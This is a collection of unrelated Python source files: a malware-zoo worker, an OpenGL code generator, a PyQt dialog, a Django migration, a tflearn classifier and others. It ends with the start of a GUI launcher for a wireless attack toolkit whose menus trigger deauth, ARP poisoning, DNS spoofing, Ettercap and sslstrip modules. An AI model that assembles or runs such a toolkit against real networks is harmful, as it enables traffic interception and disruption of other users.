'yara_results' : sigs_yara.scan(sample['filename']),
'submit_date' : int(time()),
'sample_type' : 'other',
'id_tag' : sample['tag']
}
self.share_data(sample_info)
self.store_sample(sample)
except Exception, e:
self.log('{0} - {1} - {2} '.format('otherworker',sample,e))
finally:
return
| nheijmans/MalZoo | malzoo/core/workers/otherworker.py | Python | gpl-2.0 | 1,518 |
# -*- coding: utf-8 -*-
#-------------------------------------------------------------------------
# drawElements Quality Program utilities
# --------------------------------------
#
# Copyright 2015 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#-------------------------------------------------------------------------
from src_util import *
def commandInitStatement (command):
return "gl->%s\t= (%s)\tloader->get(\"%s\");" % (
getFunctionMemberName(command.name),
getFunctionTypeName(command.name),
command.name)
def genFuncInit (registry):
def check(api, version):
if api == 'gl' and version >= "3.0":
return 'core'
return api == 'gles2'
genCommandLists(registry, commandInitStatement,
check = check,
directory = OPENGL_INC_DIR,
filePattern = "glwInit%s.inl",
align = True)
if __name__ == "__main__":
genFuncInit(getGLRegistry())
| endlessm/chromium-browser | third_party/angle/third_party/VK-GL-CTS/src/scripts/opengl/gen_func_init.py | Python | bsd-3-clause | 1,414 |
from click.testing import CliRunner
from tiledrasterio.scripts.cli import cli
def test_cli_count():
runner = CliRunner()
result = runner.invoke(cli, ['3'])
assert result.exit_code == 0
assert result.output == "False\nFalse\nFalse\n"
| AsgerPetersen/tiledrasterio | tests/test_cli.py | Python | mit | 252 |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'pyslvs_ui/info/about.ui'
#
# Created by: PyQt5 UI code generator 5.13.2
#
# WARNING! All changes made in this file will be lost!
from qtpy import QtCore, QtGui, QtWidgets
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.setEnabled(True)
Dialog.resize(586, 494)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/icons/main.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Dialog.setWindowIcon(icon)
Dialog.setSizeGripEnabled(False)
Dialog.setModal(True)
self.verticalLayout_7 = QtWidgets.QVBoxLayout(Dialog)
self.verticalLayout_7.setContentsMargins(-1, 6, 6, 6)
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.horizontalLayout = QtWidgets.QHBoxLayout()
self.horizontalLayout.setObjectName("horizontalLayout")
self.verticalLayout_2 = QtWidgets.QVBoxLayout()
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.iconLabel = QtWidgets.QLabel(Dialog)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.iconLabel.sizePolicy().hasHeightForWidth())
self.iconLabel.setSizePolicy(sizePolicy)
self.iconLabel.setAlignment(QtCore.Qt.AlignLeading|QtCore.Qt.AlignLeft|QtCore.Qt.AlignTop)
self.iconLabel.setObjectName("iconLabel")
self.verticalLayout_2.addWidget(self.iconLabel)
spacerItem = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout_2.addItem(spacerItem)
self.horizontalLayout.addLayout(self.verticalLayout_2)
self.verticalLayout_3 = QtWidgets.QVBoxLayout()
self.verticalLayout_3.setObjectName("verticalLayout_3")
self.title_label = QtWidgets.QLabel(Dialog)
self.title_label.setText("")
self.title_label.setObjectName("title_label")
self.verticalLayout_3.addWidget(self.title_label)
self.tab_widget = QtWidgets.QTabWidget(Dialog)
self.tab_widget.setObjectName("tab_widget")
self.AboutTab = QtWidgets.QWidget()
self.AboutTab.setObjectName("AboutTab")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.AboutTab)
self.verticalLayout_4.setContentsMargins(6, 6, 6, 6)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.description_text = QtWidgets.QTextBrowser(self.AboutTab)
self.description_text.setObjectName("description_text")
self.verticalLayout_4.addWidget(self.description_text)
self.tab_widget.addTab(self.AboutTab, "")
self.LicenseTab = QtWidgets.QWidget()
self.LicenseTab.setObjectName("LicenseTab")
self.verticalLayout = QtWidgets.QVBoxLayout(self.LicenseTab)
self.verticalLayout.setObjectName("verticalLayout")
self.license_text = QtWidgets.QTextBrowser(self.LicenseTab)
self.license_text.setObjectName("license_text")
self.verticalLayout.addWidget(self.license_text)
self.tab_widget.addTab(self.LicenseTab, "")
self.VersionsTab = QtWidgets.QWidget()
self.VersionsTab.setObjectName("VersionsTab")
self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.VersionsTab)
self.verticalLayout_6.setContentsMargins(6, 6, 6, 6)
self.verticalLayout_6.setObjectName("verticalLayout_6")
self.ver_text = QtWidgets.QTextBrowser(self.VersionsTab)
self.ver_text.setObjectName("ver_text")
self.verticalLayout_6.addWidget(self.ver_text)
self.tab_widget.addTab(self.VersionsTab, "")
self.ArgumentsTab = QtWidgets.QWidget()
self.ArgumentsTab.setObjectName("ArgumentsTab")
self.verticalLayout_9 = QtWidgets.QVBoxLayout(self.ArgumentsTab)
self.verticalLayout_9.setContentsMargins(6, 6, 6, 6)
self.verticalLayout_9.setObjectName("verticalLayout_9")
self.args_text = QtWidgets.QTextBrowser(self.ArgumentsTab)
self.args_text.setObjectName("args_text")
self.verticalLayout_9.addWidget(self.args_text)
self.tab_widget.addTab(self.ArgumentsTab, "")
self.verticalLayout_3.addWidget(self.tab_widget)
self.horizontalLayout.addLayout(self.verticalLayout_3)
self.verticalLayout_7.addLayout(self.horizontalLayout)
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem1)
self.button_box = QtWidgets.QDialogButtonBox(Dialog)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.button_box.sizePolicy().hasHeightForWidth())
self.button_box.setSizePolicy(sizePolicy)
self.button_box.setOrientation(QtCore.Qt.Horizontal)
self.button_box.setStandardButtons(QtWidgets.QDialogButtonBox.Ok)
self.button_box.setObjectName("button_box")
self.horizontalLayout_2.addWidget(self.button_box)
self.verticalLayout_7.addLayout(self.horizontalLayout_2)
self.retranslateUi(Dialog)
self.tab_widget.setCurrentIndex(0)
self.button_box.accepted.connect(Dialog.accept)
self.button_box.rejected.connect(Dialog.reject)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
_translate = QtCore.QCoreApplication.translate
Dialog.setWindowTitle(_translate("Dialog", "About Pyslvs"))
self.iconLabel.setWhatsThis(_translate("Dialog", "Pyslvs Icon!"))
self.iconLabel.setText(_translate("Dialog", "<html><head/><body><p><img width=\"80\" src=\":/icons/main.png\"/></p></body></html>"))
self.tab_widget.setTabText(self.tab_widget.indexOf(self.AboutTab), _translate("Dialog", "About"))
self.tab_widget.setTabText(self.tab_widget.indexOf(self.LicenseTab), _translate("Dialog", "LICENSE"))
self.tab_widget.setTabText(self.tab_widget.indexOf(self.VersionsTab), _translate("Dialog", "Versions"))
self.tab_widget.setTabText(self.tab_widget.indexOf(self.ArgumentsTab), _translate("Dialog", "Arguments"))
self.button_box.setWhatsThis(_translate("Dialog", "Click to exit"))
from pyslvs_ui import icons_rc
| KmolYuan/Pyslvs-PyQt5 | pyslvs_ui/info/about_ui.py | Python | agpl-3.0 | 6,689 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('api', '0004_auto_20150716_2026'),
]
operations = [
migrations.CreateModel(
name='MonsterPosition',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('latitude', models.FloatField()),
('longitude', models.FloatField()),
('time', models.DateField(auto_now=True)),
('mid', models.ForeignKey(to='api.Monster')),
],
),
migrations.CreateModel(
name='UserPosition',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('latitude', models.FloatField()),
('longitude', models.FloatField()),
('time', models.DateField(auto_now=True)),
('uid', models.ForeignKey(to='api.User')),
],
),
migrations.RemoveField(
model_name='position',
name='uid',
),
migrations.DeleteModel(
name='Position',
),
]
| g82411/s_square | api/migrations/0005_auto_20150725_0026.py | Python | apache-2.0 | 1,321 |
#!env/python3
# coding: utf-8
import os
import sys
import datetime
import subprocess
import argparse
import reprlib
import time
import logging
from config import *
from common import *
from scripts import *
logging.basicConfig(filename=CONFIG["LOG_FILE"],level=logging.INFO)
# Import all bench
BENCHES = {}
BENCHES["B008"] = poc_008.Bench(CONFIG)
for key, bench in BENCHES.items():
if (True): #args.script == key):
start_0 = datetime.datetime.now()
log(bench.description)
log("Init DB :")
start_1 = datetime.datetime.now()
bench.init_db()
end = datetime.datetime.now()
log("Init DB done : " + str((end - start_1).seconds) + "s")
log("File(s) import start : " )
for file in CONFIG["VCF_FILES"]:
file = CONFIG["INPUT_ROOT"] + file
# console verbose
bashCommand = 'grep -v "^#" ' + str(file) +' | wc -l'
if file.endswith(".vcf.gz"):
bashCommand = "z" + bashCommand
# process = subprocess.Popen(bashCommand.split(), stdout=subprocess.PIPE)
process = subprocess.Popen(bashCommand, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
cmd_out = process.communicate()[0]
records_count = int(cmd_out.decode('utf8'))
log(" - Start import file : " + file + " (" + str(records_count) + " lines) ("+humansize(file) +")")
start_1 = datetime.datetime.now()
bench.import_vcf(file, records_count, CONFIG["LOG_FILE"], CONFIG["STATS_FILE"])
end = datetime.datetime.now()
log(" - File import done : " + str((end - start_1).seconds) + "s")
end = datetime.datetime.now()
log("All import(s) done : " + str((end - start_0).seconds) + "s")
# run tests | REGOVAR/Sandbox | benchs/db/run.py | Python | agpl-3.0 | 1,635 |
"""
Based on the tflearn example located here:
https://github.com/tflearn/tflearn/blob/master/examples/images/convnet_cifar10.py
"""
from __future__ import division, print_function, absolute_import
# Import tflearn and some helpers
import tflearn
from tflearn.data_utils import shuffle
from tflearn.layers.core import input_data, dropout, fully_connected
from tflearn.layers.conv import conv_2d, max_pool_2d
from tflearn.layers.estimator import regression
from tflearn.data_preprocessing import ImagePreprocessing
from tflearn.data_augmentation import ImageAugmentation
import pickle
# Load the data set
X, Y, X_test, Y_test = pickle.load(open("full_dataset.pkl", "rb"))
# Shuffle the data
X, Y = shuffle(X, Y)
# Make sure the data is normalized
img_prep = ImagePreprocessing()
img_prep.add_featurewise_zero_center()
img_prep.add_featurewise_stdnorm()
# Create extra synthetic training data by flipping, rotating and blurring the
# images on our data set.
img_aug = ImageAugmentation()
img_aug.add_random_flip_leftright()
img_aug.add_random_rotation(max_angle=25.)
img_aug.add_random_blur(sigma_max=3.)
# Define our network architecture:
# Input is a 32x32 image with 3 color channels (red, green and blue)
network = input_data(shape=[None, 32, 32, 3],
data_preprocessing=img_prep,
data_augmentation=img_aug)
# Step 1: Convolution
network = conv_2d(network, 32, 3, activation='relu')
# Step 2: Max pooling
network = max_pool_2d(network, 2)
# Step 3: Convolution again
network = conv_2d(network, 64, 3, activation='relu')
# Step 4: Convolution yet again
network = conv_2d(network, 64, 3, activation='relu')
# Step 5: Max pooling again
network = max_pool_2d(network, 2)
# Step 6: Fully-connected 512 node neural network
network = fully_connected(network, 512, activation='relu')
# Step 7: Dropout - throw away some data randomly during training to prevent over-fitting
network = dropout(network, 0.5)
# Step 8: Fully-connected neural network with two outputs (0=isn't a bird, 1=is a bird) to make the final prediction
network = fully_connected(network, 2, activation='softmax')
# Tell tflearn how we want to train the network
network = regression(network, optimizer='adam',
loss='categorical_crossentropy',
learning_rate=0.001)
# Wrap the network in a model object
model = tflearn.DNN(network, tensorboard_verbose=0, checkpoint_path='people-classifier.tfl.ckpt')
# Train it! We'll do 100 training passes and monitor it as it goes.
model.fit(X, Y, n_epoch=100, shuffle=True, validation_set=(X_test, Y_test),
show_metric=True, batch_size=96,
snapshot_epoch=True,
run_id='people-classifier')
# Save model when training is complete to a file
model.save("people-classifier.tfl")
print("Network trained and saved as people-classifier.tfl!")
| rdjdejong/LerenEnBeslissen-2017 | convNN.py | Python | mit | 2,866 |
# Name: AttributePanel.py
# Purpose: View components for editing attributes
# Author: Roman Rolinsky <rolinsky@mema.ucl.ac.be>
# Created: 17.06.2007
# RCS-ID: $Id: AttributePanel.py 73215 2012-12-19 18:05:05Z RD $
import string
import wx
import wx.lib.buttons as buttons
from globals import *
import params
import component
import undo
import images
labelSize = (100,-1)
# Panel class is the attribute panel containing class name, XRC ID and
# a notebook with particular pages.
class ScrolledPage(wx.ScrolledWindow):
def __init__(self, parent):
wx.ScrolledWindow.__init__(self, parent)
self.topSizer = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(self.topSizer)
self.panel = None
self.SetScrollRate(5, 5)
def Reset(self):
if self.panel:
self.panel.Destroy()
self.panel = None
def SetPanel(self, panel):
self.Reset()
self.panel = panel
self.topSizer.Add(panel, 0, wx.ALL | wx.EXPAND, 2)
self.topSizer.Layout()
self.SendSizeEvent()
# No highlighting please
class ToggleButton(buttons.GenBitmapToggleButton):
def GetBackgroundBrush(self, dc):
colBg = self.GetBackgroundColour()
brush = wx.Brush(colBg, wx.SOLID)
if self.style & wx.BORDER_NONE:
myAttr = self.GetDefaultAttributes()
parAttr = self.GetParent().GetDefaultAttributes()
myDef = colBg == myAttr.colBg
parDef = self.GetParent().GetBackgroundColour() == parAttr.colBg
if myDef and parDef:
if wx.Platform == "__WXMAC__":
brush.MacSetTheme(1) # 1 == kThemeBrushDialogBackgroundActive
elif wx.Platform == "__WXMSW__":
if self.DoEraseBackground(dc):
brush = None
elif myDef and not parDef:
colBg = self.GetParent().GetBackgroundColour()
brush = wx.Brush(colBg, wx.SOLID)
return brush
class Panel(wx.Panel):
'''Attribute panel main class.'''
def __init__(self, *args, **kw):
wx.Panel.__init__(self, *args, **kw)
# Set common sizes
params.InitParams(self)
topSizer = wx.BoxSizer(wx.VERTICAL)
pinSizer = wx.BoxSizer(wx.HORIZONTAL)
sizer = wx.FlexGridSizer(cols=2, vgap=1, hgap=5)
self.labelRef = wx.StaticText(self, -1, 'ref:')
self.textRef = params.ParamText(self, 'ref', textWidth=200)
sizer.AddMany([ (self.labelRef, 0, wx.ALIGN_CENTER_VERTICAL),
(self.textRef, 0, wx.LEFT, 5) ])
self.labelClass = wx.StaticText(self, -1, 'class:')
self.textClass = params.ParamText(self, 'class', textWidth=200)
sizer.AddMany([ (self.labelClass, 0, wx.ALIGN_CENTER_VERTICAL),
(self.textClass, 0, wx.LEFT, 5) ])
self.labelName = wx.StaticText(self, -1, 'name:')
self.textName = params.ParamText(self, 'name', textWidth=200)
sizer.AddMany([ (self.labelName, 0, wx.ALIGN_CENTER_VERTICAL),
(self.textName, 0, wx.LEFT, 5) ])
pinSizer.Add(sizer, 0, wx.ALL, 5)
pinSizer.Add((0, 0), 1)
self.pinButton = ToggleButton(self, bitmap=images.ToolPin.GetBitmap(),
style=wx.BORDER_NONE)
self.pinButton.SetBitmapSelected(images.ToolPinDown.GetBitmap())
self.pinButton.SetToggle(g.conf.panelPinState)
self.pinButton.SetToolTipString('Sticky page selection')
pinSizer.Add(self.pinButton)
topSizer.Add(pinSizer, 0, wx.EXPAND)
self.sizer = sizer
self.nb = wx.Notebook(self, -1)
if wx.Platform == '__WXGTK__':
# Redefine AddPage on GTK to fix when page added is not shown
_oldAddPage = wx.Notebook.AddPage
def _newAddPage(self, page, label):
_oldAddPage(self, page, label)
page.Show(True)
wx.Notebook.AddPage = _newAddPage
# Create scrolled windows for panels
self.pageA = ScrolledPage(self.nb)
self.nb.AddPage(self.pageA, 'Attributes')
# Style page
self.pageStyle = ScrolledPage(self.nb)
self.pageStyle.Hide()
# Extra style page
self.pageExStyle = ScrolledPage(self.nb)
self.pageExStyle.Hide()
# Window attributes page
self.pageWA = ScrolledPage(self.nb)
self.pageWA.Hide()
# Implicit attributes page
self.pageIA = ScrolledPage(self.nb)
self.pageIA.Hide()
# Code page
self.pageCode = ScrolledPage(self.nb)
self.pageCode.Hide()
topSizer.Add(self.nb, 1, wx.EXPAND)
self.SetSizer(topSizer)
self.undo = None # pending undo object
def SetData(self, container, comp, node):
oldLabel = self.nb.GetPageText(self.nb.GetSelection())
self.nb.SetSelection(0)
map(self.nb.RemovePage, range(self.nb.GetPageCount()-1, 0, -1))
# Don't freeze while removing the pages, but do it
# after the removes instead. See
# https://groups.google.com/d/topic/wxpython-users/I8AJgkUCPj8/discussion
self.Freeze()
self.container = container
self.comp = comp
self.node = node # main node
self.refNode = node
panels = []
# Class and name
if node.nodeType == node.COMMENT_NODE:
self.labelRef.Hide()
self.textRef.Hide()
self.labelClass.Hide()
self.textClass.Hide()
elif node.tagName == 'object_ref':
self.labelRef.Show()
self.textRef.Show()
self.textRef.SetValue(node.getAttribute('ref'))
self.labelClass.Hide()
self.textClass.Hide()
# 'class' can be present for ref?
self.textClass.SetValue(node.getAttribute('class'))
else:
self.labelRef.Hide()
self.textRef.Hide()
if comp.klass != 'root':
self.labelClass.Show()
self.textClass.Show()
subclass = node.getAttribute('subclass')
if not subclass:
self.textClass.SetValue(node.getAttribute('class'))
else:
self.textClass.SetValue(subclass + '(%s)' % node.getAttribute('class'))
else: # root node
self.labelClass.Hide()
self.textClass.Hide()
self.labelRef.Hide()
self.textRef.Hide()
self.labelName.Show(comp.hasName)
self.textName.Show(comp.hasName)
if comp.hasName:
self.textName.SetValue(node.getAttribute('name'))
self.Layout() # update after hiding/showing
panel = AttributePanel(self.pageA, comp.attributes, comp.params, comp.renameDict)
panels.append(panel)
self.pageA.SetPanel(panel)
self.SetValues(panel, node)
if comp.windowAttributes:
panel = AttributePanel(self.pageWA, comp.windowAttributes,
rename_dict = params.WARenameDict)
panels.append(panel)
self.pageWA.SetPanel(panel)
self.nb.AddPage(self.pageWA, "Look'n'Feel")
self.SetValues(panel, node)
if comp.styles or comp.genericStyles:
# Create style page
panel = params.StylePanel(self.pageStyle, comp.styles, comp.genericStyles,
equiv = comp.equivStyles)
panels.append(panel)
self.pageStyle.SetPanel(panel)
self.nb.AddPage(self.pageStyle, 'Style')
self.SetStyleValues(panel, comp.getAttribute(node, 'style'))
if comp.exStyles or comp.genericExStyles:
# Create extra style page
panel = params.StylePanel(self.pageExStyle, comp.exStyles + comp.genericExStyles,
tag='exstyle', equiv = comp.equivStyles)
panels.append(panel)
self.pageExStyle.SetPanel(panel)
self.nb.AddPage(self.pageExStyle, 'ExStyle')
self.SetStyleValues(panel, comp.getAttribute(node, 'exstyle'))
# Additional panel for hidden node
if container and container.requireImplicit(node) and container.implicitAttributes:
panel = AttributePanel(self.pageIA,
container.implicitAttributes,
container.implicitParams,
container.implicitRenameDict)
panel.comp = container
panels.append(panel)
self.pageIA.SetPanel(panel)
self.nb.AddPage(self.pageIA, container.implicitPageName)
self.SetValues(panel, node.parentNode)
if comp.hasCode:
# Create code page
panel = CodePanel(self.pageCode, comp.events)
panel.node = node
panels.append(panel)
self.pageCode.SetPanel(panel)
self.nb.AddPage(self.pageCode, 'Code')
self.SetCodeValues(panel, comp.getAttribute(node, 'XRCED'))
# Select old page if possible and pin is down
if g.conf.panelPinState:
for i in range(1, self.nb.GetPageCount()):
if oldLabel == self.nb.GetPageText(i):
self.nb.SetSelection(i)
break
self.Thaw()
return panels
def Clear(self):
self.comp = None
self.nb.SetSelection(0)
map(self.nb.RemovePage, range(self.nb.GetPageCount()-1, 0, -1))
self.pageA.Reset()
self.undo = None
self.textClass.SetValue('')
self.labelName.Show(False)
self.textName.Show(False)
self.Layout()
def GetActivePanel(self):
if self.nb.GetSelection() >= 0:
return self.nb.GetPage(self.nb.GetSelection()).panel
else:
return None
# Set data for a panel
def SetValues(self, panel, node):
panel.node = node
if isinstance(panel, AttributePanel) and panel.comp:
comp = panel.comp
else:
comp = self.comp
for a,w in panel.controls:
value = comp.getAttribute(node, a)
w.SetValue(value)
# Set data for a style panel
def SetStyleValues(self, panel, style):
panel.style = style
panel.node = self.node
panel.SetValues([('XRCED', style)])
# Set data for a style panel
def SetCodeValues(self, panel, data):
panel.SetValues([('XRCED', data)])
################################################################################
class AttributePanel(wx.Panel):
'''Particular attribute panel, normally inside a notebook.'''
def __init__(self, parent, attributes, param_dict={}, rename_dict={}):
wx.Panel.__init__(self, parent, -1)
self.controls = []
self.comp = None # if not None overrides default component
sizer = wx.FlexGridSizer(len(attributes), 2, 0, 0)
sizer.AddGrowableCol(1, 0)
for a in attributes:
# Find good control class
paramClass = param_dict.get(a, params.paramDict.get(a, params.ParamText))
sParam = rename_dict.get(a, a)
control = paramClass(self, sParam)
labelPanel = wx.Panel(self, -1)
labelSizer = wx.BoxSizer()
labelPanel.SetSizer(labelSizer)
if control.isCheck: # checkbox-like control
label = wx.StaticText(labelPanel, -1, control.defaultString)
sizer.AddMany([ (control, 1, wx.EXPAND),
(labelPanel, 1, wx.EXPAND) ])
labelSizer.Add(label, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT, 2)
else:
if sParam:
label = wx.StaticText(labelPanel, -1, sParam, size=labelSize)
sizer.AddMany([ (labelPanel, 1, wx.EXPAND),
(control, 1, wx.EXPAND) ])
else: # for node-level params
label = wx.StaticText(labelPanel, -1, '')
sizer.Add(control, 1, wx.LEFT, 20)
labelSizer.Add(label, 0, wx.ALIGN_CENTER_VERTICAL | wx.LEFT, 20)
self.controls.append((a, control))
self.SetSizerAndFit(sizer)
def GetValues(self):
'''Generic method used for creating XML and for other operations.'''
return [(a,c.GetValue()) for a,c in self.controls]
def SetValues(self, values):
'''Generic method used for undo.'''
for ac,a2v in zip(self.controls, values):
a,c = ac
v = a2v[1]
c.SetValue(v)
################################################################################
class CodePanel(wx.Panel):
ID_BUTTON_DEL = wx.NewId()
ID_COMBO_EVENT = wx.NewId()
ART_REMOVE = 'ART_REMOVE'
'''Code generation panel.'''
def __init__(self, parent, events):
wx.Panel.__init__(self, parent, -1)
self.SetFont(g.smallerFont())
self.events = events
self.checks = []
topSizer = wx.BoxSizer(wx.HORIZONTAL)
# Events on the left
leftSizer = wx.BoxSizer(wx.VERTICAL)
sizer = wx.GridSizer(cols=1, vgap=0, hgap=5)
label = wx.StaticText(self, label='Events')
label.SetFont(g.labelFont())
sizer.Add(label, 0, wx.LEFT, 20)
for ev in events:
check = wx.CheckBox(self, label=ev)
sizer.Add(check)
self.checks.append((ev, check))
leftSizer.Add(sizer)
# Additional comboboxes
self.extra = []
self.eventSizer = wx.FlexGridSizer(cols=2)
leftSizer.Add(self.eventSizer)
topSizer.Add(leftSizer)
# Right sizer
rightSizer = wx.BoxSizer(wx.VERTICAL)
rightSizer.Add((0, 10))
if g.Presenter.container is not component.Manager.rootComponent:
self.checkVar = wx.CheckBox(self, label='assign variable')
rightSizer.Add(self.checkVar, 0, wx.LEFT, 20)
else:
self.checkVar = None
topSizer.Add(rightSizer)
# Cach all checkbox events
self.Bind(wx.EVT_CHECKBOX, self.OnCheck)
self.SetSizerAndFit(topSizer)
# Extra combos and buttons
self.Bind(wx.EVT_BUTTON, self.OnButtonDel, id=self.ID_BUTTON_DEL)
self.Bind(wx.EVT_COMBOBOX, self.OnComboEvent, id=self.ID_COMBO_EVENT)
self.Bind(wx.EVT_TEXT, self.OnComboText, id=self.ID_COMBO_EVENT)
def GetValues(self):
events = []
for s,check in self.checks:
if check.IsChecked(): events.append(s)
# Encode data to a dictionary and the cPicke it
data = {}
for btn,combo in self.extra[:-1]:
events.append(combo.GetValue())
if events: data['events'] = '|'.join(events)
if self.checkVar and self.checkVar.GetValue(): data['assign_var'] = '1'
if data:
return [('XRCED', data)]
else:
return []
def AddExtraEvent(self, event=''):
btn = wx.BitmapButton(self, self.ID_BUTTON_DEL,
bitmap=wx.ArtProvider.GetBitmap(self.ART_REMOVE, wx.ART_BUTTON),
size=(20,20))
if not event: btn.Disable()
self.eventSizer.Add(btn, 0, wx.ALIGN_CENTRE_VERTICAL)
combo = wx.ComboBox(self, self.ID_COMBO_EVENT, value=event, choices=component.Component.genericEvents)
btn.combo = combo
self.eventSizer.Add(combo)
self.extra.append((btn, combo))
def SetValues(self, values):
data = values[0][1]
events = data.get('events', '').split('|')
if events == ['']: events = []
for ev,check in self.checks:
check.SetValue(ev in events)
# Add comboboxes for other events
for ev in events:
if ev not in self.events:
self.AddExtraEvent(ev)
# Empty combo box for adding new events
self.AddExtraEvent()
self.Fit()
self.SetMinSize(self.GetBestSize())
if self.checkVar:
self.checkVar.SetValue(int(data.get('assign_var', '0')))
def OnCheck(self, evt):
g.Presenter.setApplied(False)
def OnButtonDel(self, evt):
btn = evt.GetEventObject()
self.extra.remove((btn, btn.combo))
btn.combo.Destroy()
btn.Destroy()
self.eventSizer.Layout()
self.Fit()
self.SetMinSize(self.GetBestSize())
g.Presenter.setApplied(False)
def OnComboText(self, evt):
if evt.GetEventObject() == self.extra[-1][1]:
self.extra[-1][0].Enable()
self.AddExtraEvent()
self.eventSizer.Layout()
self.Fit()
self.SetMinSize(self.GetBestSize())
g.Presenter.setApplied(False)
def OnComboEvent(self, evt):
if evt.GetEventObject() == self.extra[-1][1]:
self.extra[-1][0].Enable()
self.AddExtraEvent()
self.eventSizer.Layout()
self.Fit()
self.SetMinSize(self.GetBestSize())
g.Presenter.setApplied(False)
| garrettcap/Bulletproof-Backup | wx/tools/XRCed/AttributePanel.py | Python | gpl-2.0 | 17,379 |
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from shutil import move
from time import sleep
from platform import dist
from re import search
from os import geteuid,mkdir,system,path,getcwd,chdir,remove,popen
from sys import argv
if search("/usr/share/",argv[0]):
chdir("/usr/share/PEH-wifi-attack/")
from Modules.DHCPstarvation import frm_dhcp_Attack,frm_dhcp_main
from Modules.deauth_func import frm_window
from Modules.mac_change_func import frm_mac_generator
from Modules.Probe_func import frm_PMonitor
from Modules.Dns_Func import frm_dnsspoof
from Modules.networksdisc import frm_GetIP
from Modules.AttackUp import frm_update_attack
from Core.check import check_dependencies
from Core.check_privilege import frm_privelege
from Core.Settings import frm_Settings
from Modules.AttackUp import frm_WinSoftUp
from Core.update import frm_Update
from Modules.arps_Posion import frm_Arp_Poison
__author__= "@mh4x0f P0cl4bs Team"
__version__= "0.5.9"
__date_create__= "18/01/2015"
__update__="07/06/2015"
__edited_by__= "h@ck3rb0lt freelancer"
__edited_version__= "0.6.0"
__edited_date__= "25/06/2015"
__edited_update__= "soon as possible"
class frmControl(QMainWindow):
def __init__(self, parent=None):
super(frmControl, self).__init__(parent)
self.form_widget = frm_main(self)
self.setCentralWidget(self.form_widget)
self.setWindowTitle("PEH-wifi-attack " + __edited_version__)
self.config = frm_Settings()
self.loadtheme(self.config.XmlThemeSelected())
def loadtheme(self,theme):
if theme != "theme2":
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
else:
sshFile=("Core/%s.css"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
def center(self):
frameGm = self.frameGeometry()
centerPoint = QDesktopWidget().availableGeometry().center()
frameGm.moveCenter(centerPoint)
self.move(frameGm.topLeft())
class frm_main(QWidget):
def __init__(self, parent = None):
super(frm_main, self).__init__(parent)
self.create_sys_tray()
self.Main = QVBoxLayout()
self.config = frm_Settings()
self.module_arp = frm_Arp_Poison()
self.intGUI()
self.setGeometry(0, 0, 300, 400)
self.interface = "wlan"
def intGUI(self):
self.myQMenuBar = QMenuBar(self)
self.myQMenuBar.setFixedWidth(400)
Menu_file = self.myQMenuBar.addMenu('&File')
action_settings = QAction('Settings',self)
action_settings.setShortcut("Ctrl+X")
action_settings.triggered.connect(self.show_settings)
exitAction = QAction('Exit', self)
exitAction.triggered.connect(exit)
Menu_file.addAction(exitAction)
Menu_tools = self.myQMenuBar.addMenu('&Tools')
etter_conf = QAction("Edit Etter.dns", self)
etter_conf.setShortcut("Ctrl+U")
dns_spoof = QAction("Active Dns Spoof", self)
dns_spoof.setShortcut("Ctrl+D")
ettercap = QAction("Active Ettercap", self)
ettercap.setShortcut("Ctrl+E")
ssl = QAction("Active Sslstrip ", self)
ssl.setShortcut("Ctrl+S")
btn_drift = QAction("Active DriftNet", self)
btn_drift.setShortcut("Ctrl+Y")
etter_conf.triggered.connect(self.Edit_etter)
dns_spoof.triggered.connect(self.start_dns)
ettercap.triggered.connect(self.start_etter)
ssl.triggered.connect(self.start_ssl)
btn_drift.triggered.connect(self.start_dift)
Menu_tools.addAction(etter_conf)
Menu_tools.addAction(dns_spoof)
Menu_tools.addAction(ettercap)
Menu_tools.addAction(ssl)
Menu_tools.addAction(btn_drift)
Menu_module = self.myQMenuBar.addMenu("&Modules")
btn_deauth = QAction("Deauth Attack", self)
btn_deauth.setShortcut("Ctrl+W")
btn_probe = QAction("Probe Request",self)
btn_probe.setShortcut("Ctrl+K")
btn_mac = QAction("Mac Changer", self)
btn_mac.setShortcut("Ctrl+M")
btn_ip_list = QAction("Device FingerPrint", self)
btn_ip_list.setShortcut("Ctrl+G")
